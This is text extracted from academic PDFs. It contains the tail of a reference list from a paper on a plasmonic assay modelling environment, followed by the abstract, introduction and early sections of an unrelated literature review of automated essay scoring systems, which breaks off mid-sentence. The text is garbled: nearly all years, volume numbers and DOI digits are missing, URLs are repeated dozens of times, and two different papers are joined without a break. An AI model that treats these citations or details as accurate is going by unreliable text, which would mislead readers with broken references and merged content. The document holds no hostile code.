setup of quasi-monocolor gamma-ray source. – arxiv preprint. arxiv: . . lipoprotein l-d, verma r, srivastava sk, gupta bd. . surface-plasmon-resonance-based fiber-optic sensor for the detection. ieee sensors journal ( ): – doi . /jsen. . . litos ik, ioannou pc, christopoulos tk, traeger-synodinos j, kanavakis e. . multianalyte, dipstick-type, nanoparticle-based dna biosensor for visual genotyping of single-nucleotide polymorphisms. biosensors & bioelectronics ( ): – doi . /j.bios. . . . liu x, wu y, wang x, li r, zhang z. . effect of interphase on effective permittivity of composites. journal of physics d: applied physics ( ): doi . / - / / / . lopatynskyi am, lopatynska og, guo lj, chegel vi. . localized surface plasmon resonance biosensor—part i: theoretical study of sensitivity—extended mie approach. ieee sensors journal ( ): – doi . /jsen. . . luo r. . effective medium theories for the optical properties of three-component composite materials. applied optics ( ): – doi . /ao. . . malasi a, kalyanaraman r, garcia h. . from mie to fresnel through effective medium approximation with multipole contributions. journal of optics ( ): doi . / - / / / . malinsky md, kelly kl, schatz gc, duyne rpv. . chain length dependence and sensing capabilities of the localized surface plasmon resonance of silver nanoparticles chemically modified with alkanethiol self-assembled monolayers. journal of the american chemical society ( ): – doi . /ja a. mayer km, hafner jh, antigen aa. . localized surface plasmon resonance sensors. chemical reviews ( ): – doi . /cr v. hughes et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /ao. . http://dx.doi.org/ . /jp y http://dx.doi.org/ . / . http://dx.doi.org/ . /jp h http://arxiv.org/abs/ . http://dx.doi.org/ . /jsen. . http://dx.doi.org/ . /j.bios. . . http://dx.doi.org/ . / - / / / http://dx.doi.org/ . /jsen. . http://dx.doi.org/ . /ao. . http://dx.doi.org/ . / - / / / http://dx.doi.org/ . /ja a http://dx.doi.org/ . /cr v http://dx.doi.org/ . /peerj-cs. mayer km, lee s, liao h, rostro bc, fuentes a, scully pt, nehl cl, hafner jh. . a label-free immunoassay based upon localized surface plasmon resonance of gold nanorods. acs nano ( ): – doi . /nn . mckinney w. . data structures for statistical computing in python. in: van der walt s, millman j, eds. proceedings of the th python in science conference. – . mishra ak, mishra sk, gupta bd. . spr based fiber optic sensor for refractive index sensing with enhanced detection accuracy and figure of merit in visible region. optics communications : – doi . /j.optcom. . . . mitsui k, handa y, kajikawa k. . optical fiber affinity biosensor based on localized surface plasmon resonance. applied physics letters ( ): – doi . / . . moharam mg, pommet da, grann eb, gaylord tk. . stable implementation of the rigorous coupled-wave analysis for surface-relief gratings: enhanced transmittance matrix approach. journal of the optical society of america a ( ): – doi . /josaa. . . moirangthem rs, chang y-c, wei p-k. . ellipsometry study on gold-nanoparticle-coated gold thin film for biosensing application. biomedical optics express ( ): – doi . /boe. . . myroshnychenko v, rodrı́guez-fernández j, pastoriza-santos i, funston am, novo c, mulvaney p, liz-marzán lm, garcı́a de abajo fj. . modelling the optical response of gold nanoparticles. chemical society reviews ( ): – doi . /b a. nath n, chilkoti a. . a colorimetric gold nanoparticle sensor to interrogate biomolecular interactions in real time on a surface. analytical chemistry ( ): – doi . /ac x. nikoobakht b, el-sayed ma. . preparation and growth mechanism of gold nanorods (nrs) using seed-mediated growth method. chemistry of materials ( ): – doi . /cm l. nucleicdevelopmentteam. . welcome to enaml. available at http://nucleic.github.io/enaml/ docs/. nusz gj, curry ac, marinakos sm, wax a, chilkoti a. . rational selection of gold nanorod geometry for label-free plasmonic biosensors. acs nano ( ): – doi . /nn . oliphant te. . python for scientific computing. computing in science & engineering ( ): – doi . /mcse. . . optenso. . optenso: optical engineering software. available at http://www.optenso.com/ contact/cprofile.html. orfanidis s. . electromagnetic waves and antennas. new jersey: ece rutgers. pease lf, tsai d-h, hertz jl, zangmeister ra, zachariah mr, tarlov mj. . packing and size determination of colloidal nanoclusters. langmuir: the acs journal of surfaces and colloids ( ): – doi . /la t. pei z, anderson h, myrskog a, dunér g, ingemarsson b, aastrup t. . optimizing immobilization on two-dimensional carboxyl surface: ph dependence of antibody orientation and antigen binding capacity. analytical biochemistry ( ): – doi . /j.ab. . . . pellegrini g, mattei g. . high-performance magneto-optic surface plasmon resonance sensor design: an optimization approach. plasmonics ( ): – doi . /s - - - . hughes et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /nn http://dx.doi.org/ . /j.optcom. . . http://dx.doi.org/ . / . http://dx.doi.org/ . /josaa. . http://dx.doi.org/ . /boe. . http://dx.doi.org/ . /b a http://dx.doi.org/ . /ac x http://dx.doi.org/ . /cm l http://nucleic.github.io/enaml/docs/ http://nucleic.github.io/enaml/docs/ http://nucleic.github.io/enaml/docs/ http://nucleic.github.io/enaml/docs/ http://nucleic.github.io/enaml/docs/ http://nucleic.github.io/enaml/docs/ http://nucleic.github.io/enaml/docs/ http://nucleic.github.io/enaml/docs/ http://nucleic.github.io/enaml/docs/ http://nucleic.github.io/enaml/docs/ http://nucleic.github.io/enaml/docs/ http://nucleic.github.io/enaml/docs/ http://nucleic.github.io/enaml/docs/ http://nucleic.github.io/enaml/docs/ http://nucleic.github.io/enaml/docs/ http://nucleic.github.io/enaml/docs/ http://nucleic.github.io/enaml/docs/ http://nucleic.github.io/enaml/docs/ http://nucleic.github.io/enaml/docs/ http://nucleic.github.io/enaml/docs/ http://nucleic.github.io/enaml/docs/ http://nucleic.github.io/enaml/docs/ http://nucleic.github.io/enaml/docs/ http://nucleic.github.io/enaml/docs/ http://nucleic.github.io/enaml/docs/ http://nucleic.github.io/enaml/docs/ http://nucleic.github.io/enaml/docs/ http://nucleic.github.io/enaml/docs/ http://nucleic.github.io/enaml/docs/ http://nucleic.github.io/enaml/docs/ http://nucleic.github.io/enaml/docs/ http://nucleic.github.io/enaml/docs/ http://nucleic.github.io/enaml/docs/ http://nucleic.github.io/enaml/docs/ http://nucleic.github.io/enaml/docs/ http://nucleic.github.io/enaml/docs/ http://dx.doi.org/ . /nn http://dx.doi.org/ . /mcse. . http://www.optenso.com/contact/cprofile.html http://www.optenso.com/contact/cprofile.html http://www.optenso.com/contact/cprofile.html http://www.optenso.com/contact/cprofile.html http://www.optenso.com/contact/cprofile.html http://www.optenso.com/contact/cprofile.html http://www.optenso.com/contact/cprofile.html http://www.optenso.com/contact/cprofile.html http://www.optenso.com/contact/cprofile.html http://www.optenso.com/contact/cprofile.html http://www.optenso.com/contact/cprofile.html http://www.optenso.com/contact/cprofile.html http://www.optenso.com/contact/cprofile.html http://www.optenso.com/contact/cprofile.html http://www.optenso.com/contact/cprofile.html http://www.optenso.com/contact/cprofile.html http://www.optenso.com/contact/cprofile.html http://www.optenso.com/contact/cprofile.html http://www.optenso.com/contact/cprofile.html http://www.optenso.com/contact/cprofile.html http://www.optenso.com/contact/cprofile.html http://www.optenso.com/contact/cprofile.html http://www.optenso.com/contact/cprofile.html http://www.optenso.com/contact/cprofile.html http://www.optenso.com/contact/cprofile.html http://www.optenso.com/contact/cprofile.html http://www.optenso.com/contact/cprofile.html http://www.optenso.com/contact/cprofile.html http://www.optenso.com/contact/cprofile.html http://www.optenso.com/contact/cprofile.html http://www.optenso.com/contact/cprofile.html http://www.optenso.com/contact/cprofile.html http://www.optenso.com/contact/cprofile.html http://www.optenso.com/contact/cprofile.html http://www.optenso.com/contact/cprofile.html http://www.optenso.com/contact/cprofile.html http://www.optenso.com/contact/cprofile.html http://www.optenso.com/contact/cprofile.html http://www.optenso.com/contact/cprofile.html http://www.optenso.com/contact/cprofile.html http://www.optenso.com/contact/cprofile.html http://www.optenso.com/contact/cprofile.html http://www.optenso.com/contact/cprofile.html http://www.optenso.com/contact/cprofile.html http://dx.doi.org/ . /la t http://dx.doi.org/ . /j.ab. . . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /peerj-cs. perez f, granger b. . ipython: a stystem for interactive scientific computing. computing in science and engineering ( ): – doi . /mcse. . . pollard t d. . a guide to simple and informative binding assays. molecular biology of the cell ( ): – doi . /mbc.e - - . polyanskiy mn. . refractive index database. available at http://refractiveindex.info. punjabi ns, mukherji s. . fabrication of out-of-plane multi-bend fiber-optic sensor for enhanced refractive index sensing. in: th international conference on fiber optics and photonics. :t a. . quinten m. . optical properties of nanoparticle systems. first edition. weinheim: kgaa, wiley-vch verlag & co. rathgen h. . mrcwa—multilayer rigorous coupled wave analysis. available at http://mrcwa. sourceforge.net/. richard bm, anna jt. . handbook of surface plasmon resonance. london: royal society of chemistry. rouard mp. . etudes des propriétés optiques des lames métalliques très minces. annales de physique (paris) series ii : – . sancho-parramon j. . tuning the effective dielectric function of thin film metal–dielectric composites by controlling the deposition temperature. journal of nanophotonics ( ): doi . / . . sarid d, challener w. . modern introduction to surface plasmons: theory, mathematica modeling and applications. first edition. cambridge: cambridge university press. sau tk, rogach a l, jäckel f, klar ta, feldmann j. . properties and applications of colloidal nonspherical noble metal nanoparticles. advanced materials ( ): – doi . /adma. . scarpettini af, bragas av. . coverage and aggregation of gold nanoparticles on silanized glasses. langmuir ( ): – doi . /la b. schasfoort rbm, lau wd, kooi avd, clevers h, engbers ghm. . method for estimating the single molecular affinity. analytical biochemistry ( ): – doi . /j.ab. . . . sciacca b, monro tm. . dip biosensor based on localized surface plasmon resonance at the tip of an optical fiber. langmuir: the acs journal of surfaces and colloids ( ): – doi . /la q. sharma a, gupta bd. . fibre-optic sensor based on surface plasmon resonance with ag–au alloy nanoparticle films. nanotechnology ( ): – doi . / - / / / . sharma ak, gupta bd. . on the performance of different bimetallic combinations in surface plasmon resonance based fiber optic sensors. journal of applied physics ( ): doi . / . . shrivastav am, mishra sk, gupta bd. . fiber optic spr sensor for the detection of melamine using molecular imprinting. sensors and actuators b: chemical : – doi . /j.snb. . . . singh s, verma rk, gupta bd. . led based fiber optic surface plasmon resonance sensor. optical and quantum electronics ( ): – doi . /s - - - . singh j, whitten je. . adsorption of -mercaptopropyltrimethoxysilane on silicon oxide surfaces and adsorbate interaction with thermally deposited gold. journal of physical chemistry c ( ): – doi . /jp z. hughes et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /mcse. . http://dx.doi.org/ . /mbc.e - - http://refractiveindex.info http://refractiveindex.info http://refractiveindex.info http://refractiveindex.info http://refractiveindex.info http://refractiveindex.info http://refractiveindex.info http://refractiveindex.info http://refractiveindex.info http://refractiveindex.info http://refractiveindex.info http://refractiveindex.info http://refractiveindex.info http://refractiveindex.info http://refractiveindex.info http://refractiveindex.info http://refractiveindex.info http://refractiveindex.info http://refractiveindex.info http://refractiveindex.info http://refractiveindex.info http://refractiveindex.info http://refractiveindex.info http://refractiveindex.info http://refractiveindex.info http://refractiveindex.info http://refractiveindex.info http://mrcwa.sourceforge.net/ http://mrcwa.sourceforge.net/ http://mrcwa.sourceforge.net/ http://mrcwa.sourceforge.net/ http://mrcwa.sourceforge.net/ http://mrcwa.sourceforge.net/ http://mrcwa.sourceforge.net/ http://mrcwa.sourceforge.net/ http://mrcwa.sourceforge.net/ http://mrcwa.sourceforge.net/ http://mrcwa.sourceforge.net/ http://mrcwa.sourceforge.net/ http://mrcwa.sourceforge.net/ http://mrcwa.sourceforge.net/ http://mrcwa.sourceforge.net/ http://mrcwa.sourceforge.net/ http://mrcwa.sourceforge.net/ http://mrcwa.sourceforge.net/ http://mrcwa.sourceforge.net/ http://mrcwa.sourceforge.net/ http://mrcwa.sourceforge.net/ http://mrcwa.sourceforge.net/ http://mrcwa.sourceforge.net/ http://mrcwa.sourceforge.net/ http://mrcwa.sourceforge.net/ http://mrcwa.sourceforge.net/ http://mrcwa.sourceforge.net/ http://mrcwa.sourceforge.net/ http://mrcwa.sourceforge.net/ http://dx.doi.org/ . / . http://dx.doi.org/ . /adma. http://dx.doi.org/ . /la b http://dx.doi.org/ . /j.ab. . . http://dx.doi.org/ . /la q http://dx.doi.org/ . / - / / / http://dx.doi.org/ . / . http://dx.doi.org/ . /j.snb. . . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /jp z http://dx.doi.org/ . /peerj-cs. sopra sc. . optical data from sopra sa. available at http://www.sspectra.com/sopra.html. steed rj. . transfer matrix theory for a type of uniaxial layers: from basic electromagnetism to quantum well intersubband transitions. available at http://www.researchgate.net/publication/ . sun y, xia y. . increased sensitivity of surface plasmon resonance of gold nanoshells compared to that of gold solid colloids in response to environmental changes. analytical chemistry ( ): – doi . /ac . tang l, dong c, ren j. . highly sensitive homogenous immunoassay of cancer biomarker using silver nanoparticles enhanced fluorescence correlation spectroscopy. talanta ( - ): – doi . /j.talanta. . . . trügler a. . optical properties of metallic nanoparticles. phd thesis, institut für physik, fachbereich theoretische physik karl–franzens–universität graz. tsai d-h, davila-morris m, delrio fw, guha s, zachariah mr, hackley va. . quantitative determination of competitive molecular adsorption on gold nanoparticles using attenuated total reflectance-fourier transform infrared spectroscopy. langmuir: the acs journal of surfaces and colloids ( ): – doi . /la . tsang l, kong ja, shin rt. . theory of microwave remote sensing. new york: wiley. tsortos a, papadakis g, mitsakakis k, melzak ka, gizeli e. . quantitative determination of size and shape of surface-bound dna using an acoustic wave sensor. biophysical journal ( ): – doi . /biophysj. . . van de hulst hc. . light scattering by small particles. dover books. varoquaux g. . writing a graphical application for scientific programming using traitsui: a step-by-step guide for a non-programmer. available at http://code.enthought.com/projects/traits/ docs/html/tutorials/traits ui scientific app.html. wan m, luo p, jin j, xing j, wang z, wong stc. . fabrication of localized surface plasmon resonance fiber probes using ionic self-assembled gold nanoparticles. sensors ( ): – doi . /s . wilczewska az, niemirowicz k, markiewicz kh, car h. . nanoparticles as drug delivery systems. pharmacological reports ( ): – doi . /s - ( ) - . willets ka, van duyne rp. . localized surface plasmon resonance spectroscopy and sensing. annual review of physical chemistry (october): – doi . /annurev.physchem. . . . wu b, wang q-k. . investigation of highly sensitive surface plasmon resonance biosensors with au nanoparticles embedded dielectric film using rigorous coupled wave analysis. optica applicata ( ): – . yin g, wang s-y, xu m, chen l-y. . theoretical calculation of the optical properties of gold nanoparticles. ( ): – . zakaria h, shah a, konieczny m, hoffman j, nijdam j, reeves m. . small molecule and amino acid induced aggregation of gold nanoparticles. langmuir ( ): – doi . /la v. zhdanov m. . generalized effective-medium theory of induced polarization. geophysics ( ):f –f doi . / . . hughes et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://www.sspectra.com/sopra.html http://www.sspectra.com/sopra.html http://www.sspectra.com/sopra.html http://www.sspectra.com/sopra.html http://www.sspectra.com/sopra.html http://www.sspectra.com/sopra.html http://www.sspectra.com/sopra.html http://www.sspectra.com/sopra.html http://www.sspectra.com/sopra.html http://www.sspectra.com/sopra.html http://www.sspectra.com/sopra.html http://www.sspectra.com/sopra.html http://www.sspectra.com/sopra.html http://www.sspectra.com/sopra.html http://www.sspectra.com/sopra.html http://www.sspectra.com/sopra.html http://www.sspectra.com/sopra.html http://www.sspectra.com/sopra.html http://www.sspectra.com/sopra.html http://www.sspectra.com/sopra.html http://www.sspectra.com/sopra.html http://www.sspectra.com/sopra.html http://www.sspectra.com/sopra.html http://www.sspectra.com/sopra.html http://www.sspectra.com/sopra.html http://www.sspectra.com/sopra.html http://www.sspectra.com/sopra.html http://www.sspectra.com/sopra.html http://www.sspectra.com/sopra.html http://www.sspectra.com/sopra.html http://www.sspectra.com/sopra.html http://www.sspectra.com/sopra.html http://www.sspectra.com/sopra.html http://www.sspectra.com/sopra.html http://www.researchgate.net/publication/ http://www.researchgate.net/publication/ http://www.researchgate.net/publication/ http://www.researchgate.net/publication/ http://www.researchgate.net/publication/ http://www.researchgate.net/publication/ http://www.researchgate.net/publication/ http://www.researchgate.net/publication/ http://www.researchgate.net/publication/ http://www.researchgate.net/publication/ http://www.researchgate.net/publication/ http://www.researchgate.net/publication/ http://www.researchgate.net/publication/ http://www.researchgate.net/publication/ http://www.researchgate.net/publication/ http://www.researchgate.net/publication/ http://www.researchgate.net/publication/ http://www.researchgate.net/publication/ http://www.researchgate.net/publication/ http://www.researchgate.net/publication/ http://www.researchgate.net/publication/ http://www.researchgate.net/publication/ http://www.researchgate.net/publication/ http://www.researchgate.net/publication/ http://www.researchgate.net/publication/ http://www.researchgate.net/publication/ http://www.researchgate.net/publication/ http://www.researchgate.net/publication/ http://www.researchgate.net/publication/ http://www.researchgate.net/publication/ http://www.researchgate.net/publication/ http://www.researchgate.net/publication/ http://www.researchgate.net/publication/ http://www.researchgate.net/publication/ http://www.researchgate.net/publication/ http://www.researchgate.net/publication/ http://www.researchgate.net/publication/ http://www.researchgate.net/publication/ http://www.researchgate.net/publication/ http://www.researchgate.net/publication/ http://www.researchgate.net/publication/ http://www.researchgate.net/publication/ http://www.researchgate.net/publication/ http://www.researchgate.net/publication/ http://www.researchgate.net/publication/ http://www.researchgate.net/publication/ http://www.researchgate.net/publication/ http://www.researchgate.net/publication/ http://www.researchgate.net/publication/ http://dx.doi.org/ . /ac http://dx.doi.org/ . /j.talanta. . . http://dx.doi.org/ . /la http://dx.doi.org/ . /biophysj. . http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://code.enthought.com/projects/traits/docs/html/tutorials/traits_ui_scientific_app.html http://dx.doi.org/ . /s http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . /annurev.physchem. . . http://dx.doi.org/ . /la v http://dx.doi.org/ . / . http://dx.doi.org/ . /peerj-cs. pame: plasmonic assay modeling environment introduction theory and design substrate types multilayer stack pame material classes simulation and data analysis examples of use case : refractometer case : multiplexed ag--au sensor implementation and performance future improvements conclusion about acknowledgements references submitted may accepted june published august corresponding author mohamed abdellatif hussein, teeefa@nceee.edu.eg, teeefa@gmail.com academic editor diego amancio additional information and declarations can be found on page doi . /peerj-cs. copyright hussein et al. distributed under creative commons cc-by . open access automated language essay scoring systems: a literature review mohamed abdellatif hussein , hesham hassan and mohammad nassef information and operations, national center for examination and educational evaluation, cairo, egypt faculty of computers and information, computer science department, cairo university, cairo, egypt abstract background. writing composition is a significant factor for measuring test-takers’ ability in any language exam. however, the assessment (scoring) of these writing compositions or essays is a very challenging process in terms of reliability and time. the need for objective and quick scores has raised the need for a computer system that can automatically grade essay questions targeting specific prompts. automated essay scoring (aes) systems are used to overcome the challenges of scoring writing tasks by using natural language processing (nlp) and machine learning techniques. the purpose of this paper is to review the literature for the aes systems used for grading the essay questions. methodology. we have reviewed the existing literature using google scholar, ebsco and eric to search for the terms ‘‘aes’’, ‘‘automated essay scoring’’, ‘‘automated essay grading’’, or ‘‘automatic essay’’ for essays written in english language. two categories have been identified: handcrafted features and automatically featured aes systems. the systems of the former category are closely bonded to the quality of the designed features. on the other hand, the systems of the latter category are based on the automatic learning of the features and relations between an essay and its score without any handcrafted features. we reviewed the systems of the two categories in terms of system primary focus, technique(s) used in the system, the need for training data, instructional application (feedback system), and the correlation between e-scores and human scores. the paper includes three main sections. first, we present a structured literature review of the available handcrafted features aes systems. second, we present a structured literature review of the available automatic featuring aes systems. finally, we draw a set of discussions and conclusions. results. aes models have been found to utilize a broad range of manually-tuned shallow and deep linguistic features. aes systems have many strengths in reducing labor-intensive marking activities, ensuring a consistent application of scoring criteria, and ensuring the objectivity of scoring. although many techniques have been imple- mented to improve the aes systems, three primary challenges have been identified. the challenges are lacking of the sense of the rater as a person, the potential that the systems can be deceived into giving a lower or higher score to an essay than it deserves, and the limited ability to assess the creativity of the ideas and propositions and evaluate their practicality. many techniques have only been used to address the first two challenges. subjects artificial intelligence, computer education keywords aes, automated essay scoring, essay grading, handcrafted features, automatic features extraction how to cite this article hussein ma, hassan h, nassef m. . automated language essay scoring systems: a literature review. peerj comput. sci. :e http://doi.org/ . /peerj-cs. mailto:teeefa@nceee.edu.eg mailto:teeefa@gmail.com https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://doi.org/ . /peerj-cs. introduction test items (questions) are usually classified into two types: selected-response (sr), and constructed-response (cr). the sr items, such as true/false, matching or multiple-choice, are much easier than the cr items in terms of objective scoring (isaacs et al., ). sr questions are commonly used for gathering information about knowledge, facts, higher-order thinking, and problem-solving skills. however, considerable skill is required to develop test items that measure analysis, evaluation, and other higher cognitive skills (stecher et al., ). cr items, sometimes called open-ended, include two sub-types: restricted-response and extended-response items (nitko & brookhart, ). extended-response items, such as essays, problem-based examinations, and scenarios, are like restricted-response items, except that they extend the demands made on test-takers to include more complex situations, more difficult reasoning, and higher levels of understanding which are based on real-life situations requiring test-takers to apply their knowledge and skills to new settings or situations (isaacs et al., ). in language tests, test-takers are usually required to write an essay about a given topic. human-raters score these essays based on specific scoring rubrics or schemes. it occurs that the score of an essay scored by different human-raters vary substantially because human scoring is subjective (peng, ke & xu, ). as the process of human scoring takes much time, effort, and are not always as objective as required, there is a need for an automated essay scoring system that reduces cost, time and determines an accurate and reliable score. automated essay scoring (aes) systems usually utilize natural language processing and machine learning techniques to automatically rate essays written for a target prompt (dikli, ). many aes systems have been developed over the past decades. they focus on automatically analyzing the quality of the composition and assigning a score to the text. typically, aes models exploit a wide range of manually-tuned shallow and deep linguistic features (farag, yannakoudakis & briscoe, ). recent advances in the deep learning approach have shown that applying neural network approaches to aes systems has accomplished state-of-the-art results (page, ; valenti, neri & cucchiarelli, ) with the additional benefit of using features that are automatically learnt from the data. survey methodology the purpose of this paper is to review the aes systems literature pertaining to scoring extended-response items in language writing exams. using google scholar, ebsco and eric, we searched the terms ‘‘aes’’, ‘‘automated essay scoring’’, ‘‘automated essay grading’’, or ‘‘automatic essay’’ for essays written in english language. aes systems which score objective or restricted-response items are excluded from the current research. the most common models found for aes systems are based on natural language processing (nlp), bayesian text classification, latent semantic analysis (lsa), or neural networks. we have categorized the reviewed aes systems into two main categories. the former is based on handcrafted discrete features bounded to specific domains. the latter hussein et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. is based on automatic feature extraction. for instance, artificial neural network (ann)- based approaches are capable of automatically inducing dense syntactic and semantic features from a text. the literature of the two categories has been structurally reviewed and evaluated based on certain factors including: system primary focus, technique(s) used in the system, the need for training data, instructional application (feedback system), and the correlation between e-scores and human scores. handcrafted features aes systems project essay gradertm (peg) ellis page developed the peg in . peg is considered the earliest aes system that has been built in this field. it utilizes correlation coefficients to predict the intrinsic quality of the text. it uses the terms ‘‘trins’’ and ‘‘proxes’’ to assign a score. whereas ‘‘trins’’ refers to intrinsic variables like diction, fluency, punctuation, and grammar,‘‘proxes’’ refers to correlations between intrinsic variables such as average length of words in a text, and/or text length. (dikli, ; valenti, neri & cucchiarelli, ). the peg uses a simple scoring methodology that consists of two stages. the former is the training stage and the latter is the scoring stage. peg should be trained on a sample of essays from to essays, the output of the training stage is a set of coefficients (β weights) for the proxy variables from the regression equation. in the scoring stage, proxes are identified for each essay, and are inserted into the prediction 